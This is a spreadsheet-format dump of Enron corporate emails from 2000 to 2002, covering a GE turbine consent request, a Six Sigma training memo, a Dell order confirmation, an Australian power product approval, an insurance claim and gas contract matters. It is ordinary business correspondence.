---------------------- Forwarded by Kay Mann/Corp/Enron on 04/02/2001 12:27_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
04/02/2001 10:09 AM_x000D_
_x000D_
To:   kent.shoemaker@ae.ge.com_x000D_
cc:   lee.johnson@ss.ps.ge.com_x000D_
_x000D_
Subject:  Enron/Delta Turbine Acquisition_x000D_
_x000D_
Hi Kent,_x000D_
_x000D_
I don't know whether Lee has mentioned the Delta Power deal that we are_x000D_
working on.  We are taking 4 turbines and putting them in an LLC, and_x000D_
selling some of the interest in the LLC to Delta Power.  Three of the_x000D_
turbines are turbines formerally known as LV Co Gen turbines, and we are_x000D_
buying new LM's to replace the ones we are using here.  In any event, Delta_x000D_
Power is financing the deal, and they have asked that we get GE sign off on_x000D_
the attached documents.  Therefore, I would be interested in your response_x000D_
to the attached._x000D_
_x000D_
I understand that Lee is in New Orleans today, but I'll send him a copy_x000D_
anyway._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/02/2001 10:05_x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"PARKER, Isabel" &lt;isabel.parker@freshfields.com&gt; on 04/01/2001 05:10:38 PM_x000D_
_x000D_
To:   "Carolyn Campbell (E-mail)" &lt;CCampbell@KSLAW.com&gt;, "John Keffer_x000D_
      (E-mail)" &lt;JKeffer@KSLAW.com&gt;, "Kay Mann (E-mail)"_x000D_
      &lt;kay.mann@enron.com&gt;, "Rick Vicens (E-mail)"_x000D_
      &lt;rvicens@deltapower.com&gt;, "Gregory F. Lang (E-mail)"_x000D_
      &lt;gregorylang@paulhastings.com&gt;_x000D_
cc:   "BURKE, Ted (TDB)" &lt;ted.burke@freshfields.com&gt;_x000D_
_x000D_
Subject:  Enron/Delta Turbine Acquisition_x000D_
_x000D_
_x000D_
This e-mail is confidential and may well also be legally privileged. If you_x000D_
have received it in error, you are on notice of its status.  Please notify_x000D_
us immediately by reply e-mail and then delete this message from your_x000D_
system.  Please do not copy it or use it for any purposes, or disclose its_x000D_
contents to any other person:  to do so could be a breach of confidence._x000D_
Thank you for your co-operation.  Please contact our_x000D_
IT Helpdesk on +44 (0) 20 7936 4000 Ext.2000 or email_x000D_
ITHelp@freshfields.com if you need assistance._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
As discussed during our call earlier this afternoon, please find attached_x000D_
for onward transmission to GE a draft of (i) the GE Consent and Agreement_x000D_
and (ii) the GE legal opinion._x000D_
_x000D_
Kind regards_x000D_
Isabel_x000D_
_x000D_
_x000D_
(See attached file: NY003700033.DOC)_x000D_
(See attached file: NY003699615.DOC)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 06:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'peggy.phillips@enron.com'})</t>
  </si>
  <si>
    <t>Re: Pre-Law Conf. get together "at the lake"</t>
  </si>
  <si>
    <t xml:space="preserve">I will be at Derrick's meeting in San Anton. all day (but would rather be at _x000D_
Dot's!)  DF_x000D_
_x000D_
_x000D_
From: Peggy Phillips/ENRON@enronXgate on 03/28/2001 09:34 AM_x000D_
To: Susan Scott/ENRON@enronXgate, David K Bargainer/ENRON@enronXgate, William _x000D_
E Brown/ENRON@enronXgate, Janet Butler/ENRON@enronXgate, Shelley _x000D_
Corman/ENRON@enronXgate, Philip Crowley/ENRON@enronXgate, Dari _x000D_
Dornan/ET&amp;S/Enron@ENRON, Drew Fossum/ET&amp;S/Enron@ENRON, Staci _x000D_
Holtzman/ENRON@enronXgate, Lee Huber/ET&amp;S/Enron@ENRON, Candace _x000D_
Kyle/ENRON@enronXgate, Tony Pryor/ET&amp;S/Enron@ENRON, Jim _x000D_
Talcott/ENRON@enronXgate, Michael P Moran/ENRON@enronXgate_x000D_
cc: Dorothy McCoppin/ENRON@enronXgate _x000D_
_x000D_
Subject: Pre-Law Conf. get together "at the lake"_x000D_
_x000D_
 Please respond to me whether or not you would like to meet at her lake house _x000D_
for lunch, etc., on Wednesday, May 2, before going on the San Antonio to the _x000D_
law conference.  Thanks!_x000D_
_x000D_
_x000D_
Peggy_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Jun 2002 11:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeri.fish@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kelly.chambers@enron.com', 'olivia.martinez@enron.com', 'joe.thorpe@enron.com', 'robert.veizer@enron.com', 'mike.messier@enron.com', 'tom.bowers@enron.com', 'phil.waddell@enron.com', 'jeff.hermstad@enron.com', 'doug.wickersham@enron.com', 'flemming.pedersen@enron.com', 'mark.fisher@enron.com', 'julie.johnson@enron.com', 'jay.anderson@enron.com', 'olys.martinez@enron.com', 'javier.rios@enron.com', 'edward.vanderberg@enron.com', 'kurt.anderson@enron.com', 'marvin.blanco@enron.com', 'matthew.meyers@enron.com', 'pat.weaver@enron.com', 'norm.phillips@enron.com', 'harold.thompson@enron.com', 'shawn.bachara@enron.com', 'bo.thisted@enron.com', 'chris.licon@enron.com', 'dale.whinery@enron.com', 'mike.lewis@enron.com', 'kathy.johnson@enron.com', 'mark.walker@enron.com', 'john.ruiz@enron.com', 'robert.duncan@enron.com', 'ken.hallengren@enron.com', 'christopher.wyly@enron.com', 'fred.foster@enron.com', 'becky.radovich@enron.com', 'patricia.hunter@enron.com', 'sandy.labbee@enron.com', 'mayura.botejue@enron.com', 'tony.crotsenburg@enron.com', 'gabriel.montano@enron.com', 'robert.barker@enron.com', 'shirley.peters@enron.com', 'dave.sweet@enron.com', 'randy.hardenbrook@enron.com', 'klaus.obel@enron.com', 'keith.warner@enron.com', 'john.nemila@enron.com', 'alden.zeitz@enron.com', 'naomi.brown@enron.com', 'eli.bosco@enron.com', 'david.bryant@enron.com', 'doug.crockett@enron.com', 'steve.rice@enron.com', 'jason.grizzle@enron.com', 'hollis.kimbrough@enron.com', 'jerry.holt@enron.com', 'mark.perryman@enron.com', 'don.betts@enron.com', 'kenny.rogers@enron.com', 'nicholle.henry@enron.com'})</t>
  </si>
  <si>
    <t>SIX SIGMA</t>
  </si>
  <si>
    <t>Ladies and Gentlemen,_x000D_
_x000D_
Many of you have received the Six Sigma Green Belt Training CD.  If you have _x000D_
not, contact your supervisor or Jeri Fish to obtain a copy._x000D_
All salaried GE Wind Energy employees are required to qualify as a "Green _x000D_
Belt", and others are invited to participate in this program as well. It is _x000D_
my understanding that we each will be required to perform one Six Sigma _x000D_
project during our first year as GE Wind Energy employees.  We will be _x000D_
measured to some extent by our Six Sigma project participation and successful _x000D_
implementation of the methods presented in the CD-ROM.  Annual performance _x000D_
evaluation, advancement in the organization, and salary level are all _x000D_
influenced by our Six Sigma related performance.    _x000D_
_x000D_
You recently heard Nicoa Dunne announce that GE Wind Energy had accomplished _x000D_
the integration process in shorter time than any other GE acquisition.  Our _x000D_
leadership group is proud of that achievement and has raised the bar by _x000D_
putting out the challenge to have all GE Wind Energy salaried personnel _x000D_
become Green belts in a shorter time than any other GE business unit.  I am _x000D_
asking you to do your part as a member of the Services team by successfully _x000D_
completing the study requirements and tests given in the CD for Green Belt _x000D_
qualification before July 15, 2002.  You may use time during work to study _x000D_
the material and take the test.  _x000D_
_x000D_
Please see me to pick up your personal copy of the CD-ROM so that you can get _x000D_
started.  Following your completion of the CDROM study requirements, there _x000D_
will be a 3-day Green Belt 6-Sigma Training class for all parties that have _x000D_
participated.</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 10:04:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'k..ratnala@enron.com'})</t>
  </si>
  <si>
    <t>IMMEDIATE ACTION REQUIRED:  Hold ISO December Payments for These_x000D_
 Customers</t>
  </si>
  <si>
    <t xml:space="preserve">Melissa,_x000D_
_x000D_
Please hold off on paying the following group of customers beginning with December ISO actualizations and until further notice:_x000D_
_x000D_
ARCO_x000D_
DELANO_x000D_
TOSCO_x000D_
Wheelabrator Martel_x000D_
Wheelabrator Shasta_x000D_
_x000D_
Please contact Chris Stokley, Chris Foster or myself if you have any questions._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Caroline Emmert_x000D_
</t>
  </si>
  <si>
    <t>Video conference re: Position Managers  EB15C1</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Video conference re: Position Managers  EB15C1_x000D_
_x000D_
Date:		2/8/2001_x000D_
Time:		1:00 PM - 2:00 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 01:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'amita.gosalia@enron.com'})</t>
  </si>
  <si>
    <t>Congratulations!!</t>
  </si>
  <si>
    <t>Hi Sally_x000D_
_x000D_
Congratulations on your promotion!_x000D_
_x000D_
I was hoping to congratulate you in person while you were in London - but you _x000D_
seemed really busy.  Every time you walked through our area I was on the _x000D_
phone!_x000D_
_x000D_
Hope to catch up with you next week when I visit Houston._x000D_
_x000D_
Best wishes _x000D_
_x000D_
Amita</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 08:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Dell Order Confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Scott Neal/HOU/ECT on 01/23/2001 04:46 =_x000D_
PM=20_x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Dell Computer Corp." &lt;LB_Electronic_Orders@dell.com&gt; on 01/22/2001 01:07:4=_x000D_
6=20_x000D_
PM_x000D_
To: "sneal@enron.com" &lt;sneal@enron.com&gt;_x000D_
cc: =20_x000D_
Subject: Dell Order Confirmation_x000D_
_x000D_
_x000D_
_x000D_
Dear SCOTT M NEAL,_x000D_
_x000D_
Thank you for your order. We are currently reviewing for completeness and=_x000D_
=20_x000D_
accuracy._x000D_
A separate email with your Dell Order number(s) will be sent to you after t=_x000D_
he=20_x000D_
order is processed._x000D_
_x000D_
A recap of your order is provided at the end of this message for your=20_x000D_
reference._x000D_
We encourage you to verify, print, and retain the information on this page=_x000D_
=20_x000D_
for your records._x000D_
_x000D_
Date Submitted: 1/22/01 12:58:36 PM_x000D_
_x000D_
_x000D_
_x000D_
If at any time you have questions regarding your order please contact your=_x000D_
=20_x000D_
Dell Sales Representative:_x000D_
_x000D_
Name:  EPP Sales_x000D_
Email: US_EPP_Clickathome@dell.com_x000D_
Phone: 866-220-3355_x000D_
_x000D_
_x000D_
Again, thank you for your order. We appreciate you buying from Dell and usi=_x000D_
ng=20_x000D_
your Dell Premier Pages Service._x000D_
_x000D_
Sincerely,_x000D_
Dell Premier Pages Service_x000D_
_x000D_
Shopping cart includes 1 unique item(s)_x000D_
Total Price: $1,239.00_x000D_
_x000D_
Item Detail#:1_x000D_
Dell Inspiron 5000e Notebook--Pentium&amp;#174; III processor, 700 MHz 15.0" UX=_x000D_
GA=20_x000D_
TFT Display_x000D_
_x000D_
Memory:                                  128MB SDRAM, 2 DIMMs_x000D_
Video Memory:                            16MB ATI RAGE Mobility 128=01v  3D=_x000D_
=20_x000D_
Video, 2X AGP_x000D_
Primary Hard Drive:                      10GB Ultra ATA Hard Drive_x000D_
Operating System Software:               Microsoft&amp;#174 Windows&amp;#174 2000_x000D_
Network Adapter:                         Xircom&amp;#174; 10/100 Ethernet II, P=_x000D_
C=20_x000D_
Card_x000D_
Analog Modem:                            Internal 56K Capable V.90 Fax Mode=_x000D_
m_x000D_
DVD-ROM or CD-ROM:                       Modular 24X Max/10X Min Variable=_x000D_
=20_x000D_
CD-ROM_x000D_
Bundled Software:                        Microsoft=7F Office 2000 Small=20_x000D_
Business Edition w/Bookshelf_x000D_
Norton Antivirus:                        Norton Antivirus&amp;#174; 2001_x000D_
Accessories:                             Deluxe Nylon Case_x000D_
Hardware Support Services:               3Yrs Parts &amp; Labor (Next Business=_x000D_
=20_x000D_
Day, International) + CompleteCare_x000D_
Software and Peripherals:                Project Management Services_x000D_
_x000D_
Single Item Cost: $1,239.00_x000D_
Quantity: 1_x000D_
Sub-Total for Item: $1,239.00_x000D_
____________________x000D_
_x000D_
** END OF ORDER **_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 May 2000 02:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pboyle@uwaterloo.ca'})</t>
  </si>
  <si>
    <t>Itinerary</t>
  </si>
  <si>
    <t xml:space="preserve">Phelim,_x000D_
_x000D_
FYI_x000D_
_x000D_
Vince_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 01:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: New Product Type Awaiting Approval</t>
  </si>
  <si>
    <t xml:space="preserve">David:_x000D_
_x000D_
Mark is out until next Monday._x000D_
_x000D_
If this needs immediate attention, I'm sure Tana will forward to the _x000D_
appropriate person in Mark's group. I am copying Tana for this purpose._x000D_
_x000D_
Alan_x000D_
_x000D_
_x000D_
_x000D_
	David Minns@ENRON_DEVELOPMENT_x000D_
	03/21/2001 11:20 PM_x000D_
		 _x000D_
		 To: Mark Taylor_x000D_
		 cc: Alan Aronowitz_x000D_
		 Subject: New Product Type Awaiting Approval_x000D_
_x000D_
Mark just as background to Justin's email who coordinates EOL down here. This _x000D_
is just another Australian power derivative. It will be covered by our _x000D_
existing Australian power GTC in the unlikely event there is no  ISDA master _x000D_
agreement with the  counterparty. Essentially it is an inter-regional swap _x000D_
(in the form of 2 transactions) with the fixed prices calculated by reference _x000D_
to the spread between the bid and offer. I have reviewed and approved the _x000D_
product description that closely follows the form of a similar US _x000D_
product.      _x000D_
---------------------- Forwarded by David Minns/ENRON_DEVELOPMENT on _x000D_
22/03/2001 04:11 PM ---------------------------_x000D_
_x000D_
_x000D_
Justin Timothy_x000D_
22/03/2001 03:57 PM_x000D_
To: Tom Moran/Enron@EnronXGate, Paul _x000D_
Smith/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark Taylor@ECT, Bjorn _x000D_
Hagelmann/Enron@EnronXGate, Jeff Blumenthal/Enron@EnronXGate, Matthew F _x000D_
Gockerman/Enron@EnronXGate, Susan Musch/Enron@EnronXGate_x000D_
cc: Kevin Meredith/Corp/Enron@ENRON, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: New Product Type Awaiting Approval_x000D_
_x000D_
Good morning,_x000D_
_x000D_
Just a heads up to let you know that there is a new product type awaiting _x000D_
your approval (currently "Partially Approved") in EnronOnline Datamanager. It _x000D_
is an Australian power financial spread product (#2001) and will be an _x000D_
inter-regional spread using the existing financial power swap products i.e. _x000D_
VIC, SA, NSW &amp; QLD peak &amp; flat products as the underlying contracts._x000D_
_x000D_
Our senior legal counsel in the Sydney office, David Minns, has indicated _x000D_
that the existing GTC for Australian power products (see attached) can also _x000D_
be used for this new product type._x000D_
_x000D_
I would appreciate it if you could review this as soon as possible. Please _x000D_
let me know if you require anything further._x000D_
_x000D_
Note, a sigma factor (4.07) has been assigned by RAC which will be amended _x000D_
after the product type has been approved._x000D_
_x000D_
Regards,_x000D_
_x000D_
Justin Timothy_x000D_
PCG - Sydney_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 09:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.studdert@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'chris.booth@enron.com', 'ben.jacoby@enron.com'})</t>
  </si>
  <si>
    <t>SWPC 501D5A Generator Damager onboard M/V:  INDUSTRIAL BRIDGE</t>
  </si>
  <si>
    <t>Have just talked with adjuster again, and she has preliminary verbal report _x000D_
from surveyor who says that drawings merely confirm his prior contention that _x000D_
this generator was NOT a total loss at the time of the loss, but that further _x000D_
inspection of the unit would be necessary to prove otherwise.  _x000D_
_x000D_
The comments from Andrew Edison about pressing SWPC on their responsibilities _x000D_
and ownership of the unit, this has previously been expressed by the adjuster _x000D_
to Jim Bouillion.  She definitely would like to have a sit down meeting with _x000D_
Enron people only, not SWPC at this time,  to discuss options and where we go _x000D_
from here.  She still hasn't signed the CA, but that is not necessary as she _x000D_
is not looking at the drawings and looking at them by her is not necessary _x000D_
for the purpose of a meeting with Enron.  _x000D_
_x000D_
I did not check her availability for a meeting at this time because my _x000D_
schedule for Mon-Tues is still up in the air, and Jim Bouillion has a Mon-Wed _x000D_
meeting with our captive insurer in Vermont and would not be available before _x000D_
Thursday.  Do we collectively want to go forward with the sit down meeting _x000D_
with the adjuster, and if yes, who all needs to be involved and what are _x000D_
their availabilities?_x000D_
_x000D_
Concerning the VALUE of the generator, the declared value of the entire _x000D_
shipment was $24,506,000.  There is no breakdown on the paperwork I have (or _x000D_
the broker) that puts a separate value on just the generator.  Thus I guess _x000D_
someone either has that or SWPC can provide that information.  The policy is _x000D_
not a "replacement cost value"  policy nor an "actual cash value" policy, but _x000D_
a "valued" policy.  What that means is we get paid what ever we declared the _x000D_
value to be CIF + 10%.  Hence the need to know what part of the $24,506,000 _x000D_
is the "value" of the generator._x000D_
_x000D_
I await further instructions as to how you want to proceed.</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 06:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brenda.fletcher@enron.com', 'brad.bangle@enron.com'})</t>
  </si>
  <si>
    <t>Re: Iroquois Parking Dispute</t>
  </si>
  <si>
    <t xml:space="preserve">I killed deal 396265 and added the demand charge to deal 124109._x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 09/11/2000 01:47 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
09/11/2000 01:25 PM_x000D_
To: Brenda H Fletcher/HOU/ECT@ECT, Brad Bangle/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: Re: Iroquois Parking Dispute  _x000D_
_x000D_
I entered a demand charge on deal 396265.  This is a Market East desk deal.  _x000D_
I tried to enter a demand charge on the original deal for Oct 1999 but I kept _x000D_
having problems saving the deal so I created a new one._x000D_
_x000D_
Let me know if this works._x000D_
_x000D_
_x000D_
_x000D_
Brenda H Fletcher_x000D_
09/11/2000 08:30 AM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Iroquois Parking Dispute_x000D_
_x000D_
Do you know the deal number for this October 1999 demand fee?_x000D_
---------------------- Forwarded by Brenda H Fletcher/HOU/ECT on 09/11/2000 _x000D_
08:27 AM ---------------------------_x000D_
_x000D_
_x000D_
Brad Bangle@ENRON_x000D_
09/08/2000 02:31 PM_x000D_
To: Brenda H Fletcher/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Iroquois Parking Dispute_x000D_
_x000D_
Brenda_x000D_
_x000D_
Can you push this demand item through Unify?_x000D_
---------------------- Forwarded by Brad Bangle/Corp/Enron on 09/08/2000 _x000D_
02:28 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Katherine L Kelly @ ECT                           08/24/2000 02:02 PM_x000D_
	_x000D_
_x000D_
To: Brad Bangle/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Iroquois Parking Dispute_x000D_
_x000D_
I just spoke with Chris, he's going to put the deal into sitara as a parking _x000D_
demand for the October 1999 for $10,153.82._x000D_
_x000D_
Thanks!_x000D_
---------------------- Forwarded by Katherine L Kelly/HOU/ECT on 08/24/2000 _x000D_
01:56 PM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
08/24/2000 01:21 PM_x000D_
To: Katherine L Kelly/HOU/ECT@ECT, Brad Bangle/Corp/Enron@Enron_x000D_
cc: Brenda H Fletcher/HOU/ECT@ECT _x000D_
Subject: Re: Iroquois Parking Dispute  _x000D_
_x000D_
Good job Chris._x000D_
_x000D_
My contact at Iroq is out of the office.  When she gets back, I will agree to _x000D_
pay $10,153.82 per my worksheet.  Let me know what would be the best way to _x000D_
enter this in Sitara.  I think she is back in the office next week.  I also _x000D_
think she will agree to my numbers just to get this resolved.  However, she _x000D_
may just want us to pay what I think we owe while she does her own research.  _x000D_
_x000D_
Comments?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Christopher Spears_x000D_
08/24/2000 11:38 AM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Brad Bangle/Corp/Enron@Enron, Katherine L Kelly/HOU/ECT@ECT _x000D_
Subject: Iroquois Parking Dispute_x000D_
_x000D_
Chris,_x000D_
We paid parking fees to Iroquois for 9905 and 9906 production months:_x000D_
_x000D_
May 1999 $1,934.42       &lt;- included in a wire on 6/18/99 for $1,498,033.81._x000D_
June 1999 $1,872.02       &lt;- included in a wire on 7/22/99 for $1,393,799.19._x000D_
Total  $3,806.44_x000D_
_x000D_
_x000D_
If you have any additional questions, please let me know._x000D_
_x000D_
Thanks,_x000D_
Chris_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Jul 2001 07:59:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: New Master Physical with Wheelabrator Lassen</t>
  </si>
  <si>
    <t xml:space="preserve">Have you done this?  Do you want me to do it?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Williams, Jason R (Credit)  _x000D_
Sent:	Friday, July 06, 2001 11:06 AM_x000D_
To:	Perlingiere, Debra; Dickson, Stacy E.; Nemec, Gerald; Hodge, Jeffrey T._x000D_
Subject:	New Master Physical with Wheelabrator Lassen_x000D_
_x000D_
All -_x000D_
_x000D_
Attached is a worksheet for a new ENFOLIO with Wheelabrator Lassen.  This counterparty is looking to transact on a 5-year deal sometime next week, so we need to get this executed as soon as possible._x000D_
_x000D_
Please prepare a draft at your earliest possible convenience.  I will forward the email address of the contact as soon as possible._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jay_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 04:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'amber.walker@truequote.com'})</t>
  </si>
  <si>
    <t>Oh - i forgot to mention - John Perdew wants your body.</t>
  </si>
  <si>
    <t>Mon, 25 Feb 2002 06:07:12 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'justin.fernandez@enron.com'})</t>
  </si>
  <si>
    <t>RE: 25 Feb 2002</t>
  </si>
  <si>
    <t>220 for the 25th_x000D_
_x000D_
-----Original Message-----_x000D_
From: Fernandez, Justin _x000D_
Sent: Monday, February 25, 2002 7:59 AM_x000D_
To: Parks, Joe_x000D_
Cc: Olinger, Kimberly S.; Fernandez, Justin_x000D_
Subject: 25 Feb 2002_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Joe, _x000D_
          I'm working from home today...just e-mail me the price.    If you need anything, my number is 281-347-6460.    _x000D_
 _x000D_
Thanks,_x000D_
Justin</t>
  </si>
  <si>
    <t>Sat, 31 Mar 2001 05:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.steffes@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>URGENT - Forbes draft</t>
  </si>
  <si>
    <t xml:space="preserve">I gave Marchris my comments, but if you've got time you should review.  THANKS_x000D_
_x000D_
----- Forwarded by Janel Guerrero/Corp/Enron on 03/31/2001 01:06 PM -----_x000D_
_x000D_
	Marchris Robinson_x000D_
	03/30/2001 09:10 AM_x000D_
		 _x000D_
		 To: Steve Montovano/NA/Enron@Enron, James D Steffes/NA/Enron@Enron, David _x000D_
Fairley/Enron@EnronXGate, Janel Guerrero/Corp/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Forbes draft_x000D_
_x000D_
FYI_x000D_
----- Forwarded by Marchris Robinson/NA/Enron on 03/30/2001 09:04 AM -----_x000D_
_x000D_
	"Daphne E. Gilbert" &lt;daphne@katzlaw.com&gt;_x000D_
	03/29/2001 01:52 PM_x000D_
		 _x000D_
		 To: &lt;Marchris.Robinson@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Forbes draft_x000D_
_x000D_
_x000D_
The attached is a draft article prepared by Susan Clark that we would like to _x000D_
submit to Forbes Magazine.  Please review and provided any comments you have _x000D_
by Monday, April  2._x000D_
_x000D_
www.katzlaw.com_x000D_
________________________________________x000D_
_x000D_
This transmission is intended to be delivered only to the named addressee(s) _x000D_
and may contain information that is confidential, proprietary, attorney _x000D_
work-product or attorney-client privileged.  If this information is received _x000D_
by anyone other than the named addressee(s), the recipient should immediately _x000D_
notify the sender by E-MAIL and by telephone (850) 224-9634 and obtain _x000D_
instructions as to the disposal of the transmitted material.  In no event _x000D_
shall this material be read, used, copied, reproduced, stored or retained by _x000D_
anyone other than the named addressee(s), except with the express consent of _x000D_
the sender or the named addressee(s).  Thank you._x000D_
_x000D_
_x000D_
 - forbesfinal.doc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 03:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PG&amp;E:  Enron Corp. Receivable Financing</t>
  </si>
  <si>
    <t>Based upon our negotiations in respect of the Master Netting Agreement,=20_x000D_
please be sure we notify the Enron Corp. banks that the following contracts=_x000D_
=20_x000D_
are not to be included in the receivables subject to the Enron Corp.=20_x000D_
receivable financing arrangement.  I was advised by Jeff Hodge that this li=_x000D_
ne=20_x000D_
has been restructured such that we simply provide some type of notice to th=_x000D_
e=20_x000D_
banks regarding particular contracts that are not subject to the line._x000D_
_x000D_
thank you_x000D_
_x000D_
1=09Various=09Enfolio Spot GTC=09Enron North America Corp.=09PG&amp;E Energy Se=_x000D_
rvices, Energy=20_x000D_
Trading  Corp.=09Physical_x000D_
=09=09=09=09=09Gas_x000D_
=09=09=09=09=09_x000D_
2=0912/21/00=09Master Coal Purchase and Sale Agreement=09Enron Coal Service=_x000D_
s Ltd.=09PG&amp;E Energy=20_x000D_
Trading =01)Power, L.P.=09Physical_x000D_
3=09Various=09GTC Form=09Enron North America Corp.=09PG&amp;E Energy Trading =_x000D_
=01)Power, L.P.=09Financial=20_x000D_
Electricity_x000D_
4=092/2/00=09Master Coal Purchase &amp; Sale Agreement=09Enron North America Co=_x000D_
rp.=09PG&amp;E Energy Trading =01)_x000D_
Power, L.P.=09Physical Coal_x000D_
5=0911/27/96=09Master Energy Purchase and Sale Agreement=09EPMI=09PG&amp;E Ener=_x000D_
gy Trading =01)Power, L.P.=20_x000D_
(USGEN Power)=09Electricity Physical_x000D_
6=099/1/98=09Master Agreement=09PG&amp;E Energy Services (Assigned to EEMC and =_x000D_
subsequently=20_x000D_
assigned to EPMI=09PG&amp;E Energy Trading =01)Power, L.P.=09Electricity Physic=_x000D_
al_x000D_
=09=09=09=09=09_x000D_
7=091/15/99=09ISDA Master Agreement with_x000D_
=09=09ISDA Credit Support Annex and Enron Corp. Guaranty, PG&amp;E Corp. Guaran=_x000D_
tee=09Enron Canada=20_x000D_
Corp.=09PG&amp;E Energy Trading, Canada Corp.=09Financial_x000D_
8=093/11/97=09Master Firm Gas Purchase/ Sale Agreement=09Enron Canada Corp.=_x000D_
=09PG&amp;E Energy Trading,=20_x000D_
Canada Corp.=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
9=0902/01/99=09Master Interruptible Purchase/ Sale Agreement=09Enron North =_x000D_
America Corp.=09PG&amp;E Energy=20_x000D_
Trading, Canada Corp.=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
10=0902/01/99=09Master Firm Purchase/ Sale Agreement=09Enron North America =_x000D_
Corp=09PG&amp;E Energy Trading,=20_x000D_
Canada_x000D_
=09=09=09=09Corp.=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
=09=09=09=09=09_x000D_
11=094/17/97=09Master Firm Gas Purchase/ Sale Agreement=09Enron Canada Corp=_x000D_
.=09PG&amp;E Energy Trading-Gas=20_x000D_
Corp.=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
12=091/15/99=09ISDA Master Agreement_x000D_
=09=09with ISDA Credit Support Annex and Enron Corp. Guaranty and PG&amp;E Corp=_x000D_
.=20_x000D_
Guarantee and PG7E Energy Trading Corporation Guarantee=09Enron North Ameri=_x000D_
ca Corp.=09PG&amp;E Energy=20_x000D_
Trading-Gas Corp.=09Financial_x000D_
13=092/1/99=09Master Firm Purchase/ Sale Agreement=09Enron North America Co=_x000D_
rp.=09PG&amp;E Energy=20_x000D_
Trading-Gas Corp._x000D_
=09=09=09=09(original party was PG&amp;E Energy Trading, Canada)=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
14=092/1/99=09Master Firm Purchase/ Sale Agreement=09Enron North America Co=_x000D_
rp.=09PG&amp;E Energy=20_x000D_
Trading-Gas Corp.=09Physical Gas_x000D_
15=091/10/01=09Enfolio Spot GTC=09Enron North America Corp.=09PG&amp;E Energy T=_x000D_
rading =01) Gas Corp.=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
16=093/1/95=09Enfolio Master Spot Purchase Sale Agreement=09Houston Pipe Li=_x000D_
ne Co.=09PG&amp;E Energy=20_x000D_
Trading-Gas Corp.=09Physical=20_x000D_
=09=09=09=09=09Gas_x000D_
